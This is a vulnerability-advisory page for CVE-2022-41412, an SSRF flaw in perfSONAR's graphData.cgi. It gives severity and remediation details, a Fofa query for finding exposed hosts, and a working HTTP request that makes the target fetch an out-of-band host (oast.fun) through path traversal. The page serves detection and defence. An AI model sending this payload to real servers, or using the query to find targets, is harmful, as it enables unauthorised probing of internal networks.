🔙 목록으로 돌아가기

CVE-2022-41412: perfSONAR 4.x <= 4.4.4 - Server-Side Request Forgery

TitleperfSONAR 4.x <= 4.4.4 - Server-Side Request Forgery
Authornull_hypothesis
SeverityHigh
ImpactUnauthenticated attackers can exploit SSRF vulnerabilities in the graphData.cgi component to access internal resources, bypass firewall restrictions, and potentially access sensitive performance measurement data from internal network monitoring systems.
RemediationUpgrade to perfSONAR version 4.4.5 or later that validates and restricts URL parameters in the graphData.cgi component.
CVSS Score8.6
EPSS Score0.86865
CVE IDCVE-2022-41412
CWE IDCWE-918
Fofa Querytitle="perfSONAR Toolkit"title="perfsonar toolkit"
Tags cve cve2022 ssrf hackerone packetstorm perfsonar vkev vuln

🔍 Vulnerability Description

An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks.

🌐 HTTP Request

GET /perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-41412.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-41412.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A